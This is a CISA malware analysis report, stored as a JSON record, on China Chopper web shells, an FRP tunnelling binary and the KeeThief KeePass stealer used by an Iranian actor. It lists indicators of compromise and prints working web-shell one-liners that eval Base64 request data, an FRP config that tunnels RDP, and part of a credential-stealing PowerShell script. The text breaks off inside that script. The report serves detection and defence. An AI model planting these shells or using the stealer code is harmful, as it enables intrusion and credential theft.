{
	"id": "e9af4371-de48-4b6b-b293-bc406931a3b3",
	"created_at": "2026-04-06T01:32:35.180619Z",
	"updated_at": "2026-04-10T03:21:46.806734Z",
	"deleted_at": null,
	"sha1_hash": "72d04d5e11286840e3d04797b04757cc62fc9b7d",
	"title": "MAR-10297887-1.v2 – Iranian Web Shells | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 127224,
	"plain_text": "MAR-10297887-1.v2 – Iranian Web Shells | CISA\r\nPublished: 2020-11-02 · Archived: 2026-04-06 00:52:41 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThe Iranian-based malicious cyber actor associated to this report is known to target industries associated to information\r\ntechnology, government, healthcare, financial, and insurance across the US. The threat actor has been observed exploiting\r\nseveral publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network\r\n(VPN), Citrix NetScaler, and F5 vulnerabilities. Once the actor exploits these vulnerabilities, open source web shells and/or\r\nmodified versions of the web shells are used to further entrench into a victim network. The web shells are publicly known as\r\nChunkyTuna, Tiny, and China Chopper web shells.\r\nThis product details the functionality of 18 malicious files including multiple components of the China Chopper web shell,\r\nincluding an application service provider (ASP) application that listens for incoming Hypertext Transfer Protocol (HTTP)\r\nconnections from a remote operator. The China Chopper web shell will allow the operator to pass and execute JavaScript\r\ncode on to a victim's system. The report also details additional China Chopper web shell components that allow the operator\r\nmore specific command and control (C2) capabilities including the ability to enumerate directories, upload and execute\r\nadditional payloads, and exfiltrate data.\r\nIn addition, a program data (PDB) file and a binary, which has been identified as a compiled version of the open source\r\nproject known as \"FRP\", was also analyzed. FRP allows an adversary to tunnel various types of connections to a remote\r\noperator sitting outside of the victim's network perimeter. In addition, a PowerShell shell script was analyzed that is part of\r\nthe open source project known as \"KeeThief\". This code will allow the operator to access encrypted password credentials\r\nstored by the Microsoft \"KeePass\" password management software.\r\nIt appears this adversary utilized these malicious tools to maintain persistent remote access and data exfiltration from the\r\nvictim's network. The adversary may have used the \"FRP\" utility to tunnel outbound Remote Desktop Protocol (RDP)\r\nsessions, allowing persistent access to the network from outside the firewall perimeter. The China Chopper web shell also\r\nprovides the persistent ability to navigate throughout the victim's network when inside the perimeter. Leveraging the\r\n\"KeeThief\" utility allows access to sensitive user password credentials and potentially the ability to pivot to user accounts\r\noutside of the victim's network.\r\nAn additional 7 files contain malicious Hypertext Preprocessor (PHP) code designed to function as malicious web shells,\r\nwhich were identified as ChunkyTuna and Tiny web shells. The purpose of these web shells is to accept commands and data\r\nfrom a remote operator, providing the operator C2 capabilities over a compromised system.\r\nSubmitted Files (17)\r\n134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13 (site.aspx)\r\n17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c (vti_cnf.aspx.33154034.compiled)\r\n28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea (App_Web_tcnma5bs.pdb)\r\n2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849 (prev_sh)\r\n3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c (content)\r\n4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756 (content)\r\n51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21 (df5bd34799e200951fcce77c1c0b42...)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 1 of 26\n\n547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c (df5bd34799e200951fcce77c1c0b42...)\r\n553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f (ui-bg.aspx)\r\n55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c (svchost.exe)\r\n5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a (App_Web_tcnma5bs.0.js)\r\n8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3 (content)\r\n913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0 (kee.ps1)\r\n99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc (App_Web_tcnma5bs.dll)\r\nb36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a (tiny_webshell)\r\nb443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249 (df5bd34799e200951fcce77c1c0b42...)\r\nf7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde (dllhost.dll)\r\nAdditional Files (1)\r\n10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334 (KeeTheft.dll)\r\nFindings\r\n553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f\r\nTags\r\ntrojanwebshell\r\nDetails\r\nName ui-bg.aspx\r\nSize 178 bytes\r\nType ASCII text, with no line terminators\r\nMD5 d7b7a8c120b69166643ee05bf70b37e5\r\nSHA1 2ac99374cab70f8be83c48bbf3258eae78676f65\r\nSHA256 553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f\r\nSHA512 8c51c9e3d3d39ec7b961482ed7fc8cde1804ef126b72fce270c6891f64f4371067a65a8be1cbab1ab3c8860a3e2ea206d274f064d54cf2605ff\r\nssdeep 3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtGnKRHBIwLWEDp:aEm7EnLgyKBM5Y/tZ6KCHKF2xK\r\nEntropy 5.196436\r\nAntivirus\r\nESET ASP/Webshell.T trojan\r\nSophos Troj/WebShel-F\r\nSymantec Hacktool.Jsprat\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a small JavaScript file, which contains the following code:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 2 of 26\n\n—Begin JavaScript Code—\r\n@ Page Language=\"Jscript\"%\u003e\u003c%try\r\n{\r\neval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"\r\n[Redacted]\"])),\"unsafe\");\r\n}\r\ncatch(e)\r\n{\r\n}\r\n—End JavaScript Code—\r\nAnalysis indicates this file might serve as part of a larger application. The code within the file decodes and executes data\r\nusing the JavaScript \"eval\" function. The data is attained via the JavaScript \"Request\" function indicating the data is pulled\r\nfrom a remote server using the HTTP protocol. It is believed this script is a component of the China Chopper web shell\r\nframework.\r\n134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13\r\nTags\r\ntrojanwebshell\r\nDetails\r\nName site.aspx\r\nSize 178 bytes\r\nType ASCII text, with no line terminators\r\nMD5 20d89fa1df155632fafb2c9fe1a6a038\r\nSHA1 c9cf494475de81dae5a2c54c678b4a518f46b1fe\r\nSHA256 134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13\r\nSHA512 c1d485e34153c50af79e719c4100b988ba4d289578d385d0b30d2225c20b4b8f715d215f609a141030489a337ff36a89b23d4e99bf1895466\r\nssdeep 3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtJIIDYbwLWEDvR:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5\r\nEntropy 5.201321\r\nAntivirus\r\nESET ASP/Webshell.T trojan\r\nSophos Troj/WebShel-F\r\nSymantec Hacktool.Jsprat\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a small JavaScript file, which contains the following embedded code:\r\n—Begin Embedded JavaScript—\r\nPage Language=\"Jscript\"%\u003e\u003c%try\r\n{\r\neval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"ammashnist\"])),\"unsafe\");\r\n}\r\ncatch(e)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 3 of 26\n\n{\n}\n—End Embedded JavaScript—\nThis script is designed to pull JavaScript from an existing \"Request Object\", Base64 decode and execute it. The contents of\nthe retrieved JavaScript code were not available for analysis. It is believed this web shell is a component of the China\nChopper web shell framework.\n17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c\nTags\nwebshell\nDetails\nName vti_cnf.aspx.33154034.compiled\nSize 408 bytes\nType XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators\nMD5 de1cd1c54711544508d157214323af85\nSHA1 c33a07965e06280c53e19a5d093983205433843f\nSHA256 17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c\nSHA512 8265901a684f808c612f9cfcc486aaba923e2cf8ca7fdcd3071e786ad6030c067c4147b7b4e36bb271a5f2b36e0c3f487ceb259e2f00e6afd90\nssdeep 12:MMHdWFV2q6sX1rMxA0UH17I2fUQ/1OifV2q6sW6/1:JdmsvkrGOnfUcBsve/1\nEntropy 5.120655\nAntivirus\nNo matches found.\nYARA Rules\nNo matches found.\nssdeep Matches\nNo matches found.\nDescription\nThis file is a “.compiled” file which was generated during the compilation of an ASP.NET application. It is believed this file\nwas generated during the compilation and execution of a China Chopper web shell application. Although this file cannot be\nexecuted, its presence may be considered an indicator of compromise. The file contains the following data.\n—Begin Data—\n?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n—End Data—\n5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a\nTags\nwebshell\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\nPage 4 of 26\n\nDetails\r\nName App_Web_tcnma5bs.0.js\r\nSize 8401 bytes\r\nType UTF-8 Unicode (with BOM) text, with CRLF line terminators\r\nMD5 8495abfd7356f75ad7006d2ab42d4bee\r\nSHA1 3736a085f9fe515dc7d12bbf2a1474bdd3d8d4d2\r\nSHA256 5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a\r\nSHA512 8c5fec8455ad0d529030f19626b8fe55b05f6f24b4fee1378e2d6ffa7185c5f2854074cfc30518721892f39985dc5742e81f875d5469101967a\r\nssdeep 192:VkjEVXTaaVEDAQpovRpY0NHMdWoEsxpKL:VkjEVXTaaEDAQM3NHMdJEIp4\r\nEntropy 5.246768\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis application has been identified as a component of a malicious web shell. This script has been tentatively identified as a\r\nvariant of the China Chopper web shell. Displayed below is the partial JavaScript application extracted from this script:\r\n—Begin Partial JavaScript—\r\npackage ASP {\r\n      public System.Runtime.CompilerServices.CompilerGlobalScopeAttribute()\r\n   class aspnet_client_system_web_4_0_30319__vti_cnf_aspx extends System.Web.UI.Page implements\r\nSystem.Web.SessionState.IRequiresSessionState, System.Web.IHttpHandler {\r\n              private static var __initialized : boolean;\r\n              private static var __fileDependencies : System.Object;\r\n              public System.Diagnostics.DebuggerNonUserCodeAttribute() function\r\naspnet_client_system_web_4_0_30319__vti_cnf_aspx() {\r\n           var dependencies : System.String[];\r\n           System.Web.UI.Page(this).AppRelativeVirtualPath = \"~/aspnet_client/system_web/4_0_30319/_vti_cnf.aspx\";\r\n           if ((ASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx.__initialized == false)) {\r\n               dependencies = new System.String[1];\r\n               dependencies[0] = \"~/aspnet_client/system_web/4_0_30319/_vti_cnf.aspx\";\r\n               ASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx.__fileDependencies =\r\nthis.GetWrappedFileDependencies(dependencies);\r\n               ASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx.__initialized = true;\r\n           }\r\n           this.Server.ScriptTimeout = 30000000;\r\n                  }\r\n              protected final function get Profile() : System.Web.Profile.DefaultProfile {\r\n           return System.Web.Profile.DefaultProfile(this.Context.Profile);\r\n       }\r\n              protected override function get SupportAutoEvents() : boolean {\r\n           return false;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 5 of 26\n\n}\r\n              protected final function get ApplicationInstance() : ASP.global_asax {\r\n           return ASP.global_asax(this.Context.ApplicationInstance);\r\n       }\r\n              private final System.Diagnostics.DebuggerNonUserCodeAttribute() function __BuildControlTree(__ctrl :\r\naspnet_client_system_web_4_0_30319__vti_cnf_aspx) {\r\n                      //@cc_on\r\n           //@set @position(file=\"F:\\\\inetpub\\\\wwwroot\\\\\\\\aspnet_client\\\\system_web\\\\4_0_30319\\\\_vti_cnf.aspx\";line=1)\r\n           this.InitializeCulture();\r\n                      //@set @position(end)\r\n           __ctrl.SetRenderMethodDelegate(System.Web.UI.RenderMethod(this.__Render__control1));\r\n       }\r\n              private final function __Render__control1(__w : System.Web.UI.HtmlTextWriter, parameterContainer :\r\nSystem.Web.UI.Control) {\r\n                      //@cc_on\r\n           //@set @position(file=\"F:\\\\inetpub\\\\wwwroot\\\\\\\\aspnet_client\\\\system_web\\\\4_0_30319\\\\_vti_cnf.aspx\";line=1)\r\n                            try\r\n{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"\r\n[Redacted]\"])),\"unsafe\"); } catch(e) {}\r\n                      //@set @position(end)\r\n       }\r\n—End Partial JavaScript—\r\nAnalysis indicates it is designed to operate as a web server and accept JavaScript code provided from a remote operator. The\r\npassword utilized by the remote operator to access this web shell was redacted.\r\n99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\nTags\r\nwebshell\r\nDetails\r\nName App_Web_tcnma5bs.dll\r\nSize 13312 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 18f2cf11b940a62d63fd757e20564ec6\r\nSHA1 6fbd38aff374974c59ccca7efd8e1a3205c69ce9\r\nSHA256 99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\nSHA512 190c3cb0a09ce111135d0a98d10922650c28eb895583d98b2015b67e71a2131f824863cb4402d7627648aa0660ad5eaab63ed7cae8a9a546\r\nssdeep 384:4PojaxtaTXMzS/X44tIItLzxqIj3tccsJY5Ohmqw/4JHuNkLpe+k:4PojaxyXM+/X44K2\r\nEntropy 5.143850\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 6 of 26\n\nNo matches found.\r\nPE Metadata\r\nCompile Date 2020-06-07 06:21:21-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name  \r\nFile Description  \r\nInternal Name App_Web_tcnma5bs.dll\r\nLegal Copyright  \r\nOriginal Filename App_Web_tcnma5bs.dll\r\nProduct Name  \r\nProduct Version  \r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n83b4ba5ffed3f61f2c3c07cbfb9e4645 header 512 2.606561\r\n9f9a21c74d71b03386ee22a566a1170d .text 11264 5.517535\r\ncb5b712bb6ddf459a6a953c98373b5f6 .rsrc 1024 2.512896\r\ndbd0e57bcdedc0733290c5195a01ad35 .reloc 512 0.081539\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# v7.0 / Basic .NET\r\nRelationships\r\n99344d862e... Related_To 28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\nDescription\r\nThis file is a Windows compiled .NET dynamic link library (DLL) file. It has been identified as a component of a malicious\r\nweb shell. The DLL has been tentatively identified as a variant of the China Chopper web shell. This malicious DLL\r\ncontains embedded malicious JavaScript code. A portion of the JavaScript code extracted from the decompiled DLL is\r\ndisplayed below:\r\n—Begin Extracted Code—\r\nprivate void __Render__control1(HtmlTextWriter __w, Control parameterContainer)\r\n   {\r\n    // ISSUE: type reference\r\n    // ISSUE: type reference\r\n    // ISSUE: type reference\r\n    Microsoft.JScript.StackFrame.PushStackFrameForMethod((object) this, new JSLocalField[3]\r\n    {\r\n       new JSLocalField(nameof (__w), __typeref (HtmlTextWriter), 0),\r\n       new JSLocalField(nameof (parameterContainer), __typeref (Control), 1),\r\n       new JSLocalField(\"e:6\", __typeref (object), 2)\r\n    }, ((INeedEngine) this).GetEngine());\r\n    try\r\n    {\r\n       object obj1;\r\n       try\r\n       {\r\n        object[] localVars1 = ((Microsoft.JScript.StackFrame) ((INeedEngine)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 7 of 26\n\nthis).GetEngine().ScriptObjectStackTop()).localVars;\r\n        localVars1[0] = (object) __w;\r\n        localVars1[1] = (object) parameterContainer;\r\n        object obj2;\r\n        localVars1[2] = obj2;\r\n        Eval.JScriptEvaluate((object)\r\nEncoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(this.Request[\"[Redacted]\"])), ((INeedEngine)\r\nthis).GetEngine());\r\n        object[] localVars2 = ((Microsoft.JScript.StackFrame) ((INeedEngine)\r\nthis).GetEngine().ScriptObjectStackTop()).localVars;\r\n        __w = (HtmlTextWriter) localVars2[0];\r\n        parameterContainer = (Control) localVars2[1];\r\n        obj1 = localVars2[2];\r\n       }\r\n       catch (Exception ex)\r\n       {\r\n        VsaEngine engine = ((INeedEngine) this).GetEngine();\r\n        obj1 = Try.JScriptExceptionValue((object) ex, engine);\r\n       }\r\n       object[] localVars = ((Microsoft.JScript.StackFrame) ((INeedEngine)\r\nthis).GetEngine().ScriptObjectStackTop()).localVars;\r\n       localVars[0] = (object) __w;\r\n       localVars[1] = (object) parameterContainer;\r\n       localVars[2] = obj1;\r\n    }\r\n    finally\r\n    {\r\n       ((INeedEngine) this).GetEngine().PopScriptObject();\r\n    }\r\n—End Extracted Code—\r\nAnalysis indicates the password utilized to access this web shell by the remote actor was redacted. This implant will allow a\r\nremote operator to execute JavaScript payloads on a victim's system.\r\n28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\nTags\r\nwebshell\r\nDetails\r\nName App_Web_tcnma5bs.pdb\r\nSize 24064 bytes\r\nType MSVC program database ver 7.00, 512*47 bytes\r\nMD5 3be9b7030389ad5e106f169fbe7b7458\r\nSHA1 224448b5840b71ca07c144d3f525b8971c17d4a7\r\nSHA256 28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\nSHA512 bf8b7bc82be4803099cfe956edb2699c441705955e4d7e3822501940a8e572dafcf1906c797cea8551f3407059bad03c9196bd1432038c095\r\nssdeep 384:ihIBU3Xo3Z3oTTi3aljxTi3aljKITi3aljs8Ti3aljUTi3aljBTi3alj1Ti3aljb:ihIBU4Zox1fLOx5H1bX0b6UW\r\nEntropy 3.924351\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 8 of 26\n\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n28bc161df8... Related_To 99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\nDescription\r\nThis file is a program database (PDB) file. This file correlates with compilation of the application named\r\n\"App_Web_tcnma5bs.dll\"(99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc). Although this file\r\ncannot be executed, its presence may be considered an indicator of compromise. Strings of interest extracted from this PDB\r\nlife are displayed below:\r\n—Begin Strings of Interest—\r\nF:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\nf:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\r\nc:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\web.config\r\n.ctor\r\nGlobal Code\r\nSystem\r\nSystem.Collections\r\nSystem.Text\r\nSystem.Web.UI\r\nSystem.Collections.Generic\r\nSystem.Text.RegularExpressions\r\nSystem.Xml.Linq\r\nSystem.Web.SessionState\r\nSystem.Web.Helpers\r\nSystem.Web.Routing\r\nSystem.Configuration\r\nSystem.Collections.Specialized\r\nSystem.Linq\r\nSystem.Web\r\nSystem.Web.DynamicData\r\nSystem.Web.Caching\r\nSystem.Web.Profile\r\nSystem.ComponentModel.DataAnnotations\r\nSystem.Web.UI.WebControls\r\nSystem.Web.Mvc.Ajax\r\nSystem.Web.Security\r\nSystem.Web.Mvc\r\nSystem.Web.UI.WebControls.WebParts\r\nSystem.Web.WebPages\r\nSystem.Web.Mvc.Html\r\nSystem.Web.UI.HtmlControls\r\nget_Profile\r\nASP\r\nSystem\r\nSystem.Collections\r\nSystem.Text\r\nSystem.Web.UI\r\nSystem.Collections.Generic\r\nSystem.Text.RegularExpressions\r\nSystem.Xml.Linq\r\nSystem.Web.SessionState\r\nSystem.Web.Helpers\r\nSystem.Web.Routing\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 9 of 26\n\nSystem.Configuration\r\nSystem.Collections.Specialized\r\nSystem.Linq\r\nSystem.Web\r\nSystem.Web.DynamicData\r\nSystem.Web.Caching\r\nSystem.Web.Profile\r\nSystem.ComponentModel.DataAnnotations\r\nSystem.Web.UI.WebControls\r\nSystem.Web.Mvc.Ajax\r\nSystem.Web.Security\r\nSystem.Web.Mvc\r\nSystem.Web.UI.WebControls.WebParts\r\nSystem.Web.WebPages\r\nSystem.Web.Mvc.Html\r\nSystem.Web.UI.HtmlControls\r\nget_SupportAutoEvents\r\nGetEngine\r\n0600000d\r\nSetEngine\r\n0600000e\r\nASP.aspnet_client_system_web_4_0_30319__vti_cnf_aspx\r\n87986BFE\r\n__ASP.FastObjectFactory_app_web_tcnma5bs\r\n35A8BE76\r\nJScript 0\r\n1F3114D0\r\nJScript 1\r\n062A2591\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\r\nF:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\nT[@\r\n/LinkInfo\r\n/names\r\n/src/headerblock\r\n/src/files/f:\\inetpub\\wwwroot\\\\aspnet_client\\system_web\\4_0_30319\\_vti_cnf.aspx\r\n/src/files/c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\web.config\r\n—End Strings of Interest—\r\n55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c\r\nTags\r\nproxywebshell\r\nDetails\r\nName svchost.exe\r\nSize 10532864 bytes\r\nType PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 c8bc262d7126c3399baaec3bee89d542\r\nSHA1 c94a0f902b3b8cc4ca5e4cc9004ac9eaa4614699\r\nSHA256 55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c\r\nSHA512 cf7b89d9658e618cb4f590b13bd6a6e5abcba0cddca625c7aeaaafb5ef8821a7a60620b789de4abd5d4505ffe3e9c13ad3bf1173f21e1735df5\r\nssdeep 196608:3YHvhq3/BuNnKkOeXtqugiGk9FPHxgc/uA63+w0IUX:kQBuVku1G+\r\nEntropy 6.107183\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 10 of 26\n\nAntivirus\r\nK7 Riskware ( 0040eff71 )\r\nSophos App/FRProxy-A\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n86ff3a53ecd56eaa856f8c7c28d0a8f1 header 1536 1.263684\r\n26ef590b60778bfdd9bfcbb24d832f94 .text 4546560 5.826487\r\nabdb24e1a410aa5fba49a4d1fe6a21bb .rdata 5612032 5.660454\r\n2e993dbff4bcb21d52aa1897a4e2604e .data 370688 6.023192\r\nf006061c21d3eee457ffe5e2c69cba8e .idata 1536 3.442601\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nDescription\r\nThis file is a compiled version of the open source utility named FRP. It is an administrative tool, which allows a system\r\ninside a router or firewall providing Network Address Translation, to provide network access to systems / operators located\r\noutside of the victim's network. For example, the utility could be utilized to tunnel Secure Shell (SSH) protocol connections\r\nfrom an inside system protected by a firewall and router, to a system outside of the firewall perimeter.\r\nf7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde\r\nTags\r\nwebshell\r\nDetails\r\nName dllhost.dll\r\nSize 226 bytes\r\nType ASCII text, with CRLF line terminators\r\nMD5 14df2e509b6ee8deb3ce6ba3b88e3de0\r\nSHA1 80190bdddf70a79a1735136f81309219c937458d\r\nSHA256 f7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde\r\nSHA512 6a32f2715d554c11eb0a50e39540c9e68bbb387b8a3aa1dfe4604ce6ed22a075fae0c1b3dfd07468746f4d782b1bff203f9036acaff9d6bbd2a\r\nssdeep 6:eBh3BnEWovv5O4WaundbHAVSVDOUqxTWi:enlcO4WhcSVHqxii\r\nEntropy 5.081345\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 11 of 26\n\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a configuration file, which may be utilized with the FRP binary named \"svchost.exe\"\r\n(55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c). The contents of the configuration file is\r\ndisplayed below:\r\n—Begin Configuration Data—\r\n[common]\r\nserver_addr = [IP address]\r\nserver_port = 443\r\ntls_enable = true\r\ntoken = laksddflko986wq35029735\r\n[Indy [SCCPV01] - RDP]\r\ntype = tcp\r\nuse_encryption = true\r\nlocal_ip = [IP address]\r\nlocal_port = 3389\r\nremote_port = 0\r\n—End Configuration Data—\r\nThe protocol tunneled is RDP.\r\n913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nTags\r\ntrojan\r\nDetails\r\nName kee.ps1\r\nSize 357631 bytes\r\nType awk or perl script, ASCII text, with very long lines\r\nMD5 3a83cad860a688e1f40683142280a67b\r\nSHA1 d8ad2de372296501c3eb3aa0e053708eb3914113\r\nSHA256 913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nSHA512 a7afad9c446e55e25ec6289595ebeba469df0ccbc1863c437acf64e63c13b497699804de5248664d5cb78c527ffb9d1415c36a182d32002019\r\nssdeep 6144:SJU/ny0KiejKvsM7fz0QVd/eHuwF1U1zDtyftQQKasiaUKGY4RpmOHYqmqEqJ7jO:sIyCVjz0QpcU9QlTsZb\r\nEntropy 6.018326\r\nAntivirus\r\nBitDefender Application.Hacktool.TJ\r\nCyren Trojan.NBMZ-8\r\nESET MSIL/PSW.KeeThief.A trojan\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 12 of 26\n\nIkarus Trojan.PowerShell.Pklotide\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n913ee2b048... Related_To 10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\nDescription\r\nThis file is a malicious PowerShell script. It is part of an open source application. The purpose of this script is to decrypt\r\n\"keepass\" files in an attempt to steal the victim's password credentials stored on the victim's system. During runtime, this\r\nscript decodes and utilizes the .NET executable named \"KeeTheft.dll,\"\r\n(10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334). A portion of the PowerShell script is\r\ndisplayed below:\r\n—Begin Malicious Powershell Code—\r\n#requires -version 2\r\nfunction Get-KP\r\n{\r\n[CmdletBinding()]\r\nparam (\r\n[Parameter(Position = 0,\r\nValueFromPipeline = $True)]\r\n[System.Diagnostics.Process[]]\r\n[ValidateNotNullOrEmpty()]\r\n$Process\r\n)\r\nBEGIN\r\n{\r\n    if(-not $PSBoundParameters['Process'])\r\n    {\r\n    try\r\n    {\r\n        $Process = Get-Process KeePass -ErrorAction Stop | Where-Object\r\n        {\r\n        $_.FileVersion -match '^2\\.'\r\n        }\r\n    }\r\n    catch\r\n    {\r\n        throw 'NO instances open!'\r\n    }\r\n    }\r\n    $EncodedCompressedFile = 'tL0HfFzFET/+7'\r\n    $DeflatedStream = New-Object\r\n    IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),\r\n    [IO.Compression.CompressionMode]::Decompress)\r\n    $UncompressedFileBytes = New-Object Byte[](738304)\r\n    $DeflatedStream.Read($UncompressedFileBytes, 0, 738304) | Out-Null\r\n    $Assembly =\r\n    [Reflection.Assembly]::Load($UncompressedFileBytes)\r\n}\r\nPROCESS\r\n{\r\n    ForEach($KeePassProcess in\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 13 of 26\n\n$Process)\r\n    {\r\n    if($KeePassProcess.FileVersion -match '^2\\.')\r\n    